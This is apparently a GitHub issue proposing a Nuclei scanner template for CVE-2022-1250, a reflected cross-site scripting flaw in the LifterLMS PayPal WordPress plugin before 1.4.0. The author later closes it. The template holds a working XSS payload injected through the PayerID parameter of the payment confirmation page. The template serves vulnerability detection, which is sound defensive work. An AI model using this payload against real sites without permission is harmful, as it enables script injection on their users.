CVE-2022-1250

Question

CVE-2022-1250

akincibor opened this issue 2 years ago · comments

id: CVE-2022-1250

info:
  name: LifterLMS PayPal < 1.4.0 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape some parameters from the payment confirmation page before outputting them back in the page, leading to a Reflected Cross-Site Scripting issue.
  reference:
    - https://wpscan.com/vulnerability/1f8cb0b9-7447-44db-8d13-292db5b17718
  tags: xss,wp,wordpress,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/purchase/confirm-payment/?order=order-xxxxxxx&PayerID=aa"><img src onerror=alert(/XSS/)>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><img src onerror=alert(/XSS/)>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

akincibor.eth · Answer 1 · Tue Aug 02 2022 23:44:47 GMT+0800 (China Standard Time)

Self closing as there is really really few website using it to reduce the number of nuclei request.